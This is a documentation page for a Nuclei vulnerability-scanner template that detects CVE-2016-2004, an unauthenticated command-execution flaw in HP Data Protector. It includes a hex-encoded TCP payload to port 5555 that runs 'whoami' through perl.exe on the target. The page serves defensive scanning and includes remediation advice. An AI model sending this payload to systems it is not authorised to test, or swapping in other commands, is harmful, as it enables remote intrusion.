Skip to content
Nuclei Templates

HP Data Protector - Arbitrary Command Execution

ID: CVE-2016-2004

Severity: critical

Author: pussycat0x

Tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp

Description

Section titled “Description”

HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.

YAML Source

Section titled “YAML Source”
id: CVE-2016-2004


info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.12552
    epss-percentile: 0.95291
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:5555"
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex
    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 4b0a00483046022100be1a48335bdd5124d736a557f46bd8f52fe762df2f503c55f9a0518a981fb7dc022100d60b859cd742686882c4b67f119b9a6d6232196f541d50110a37c468d904ccc7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "network/cves/2016/CVE-2016-2004.yaml"

View on Github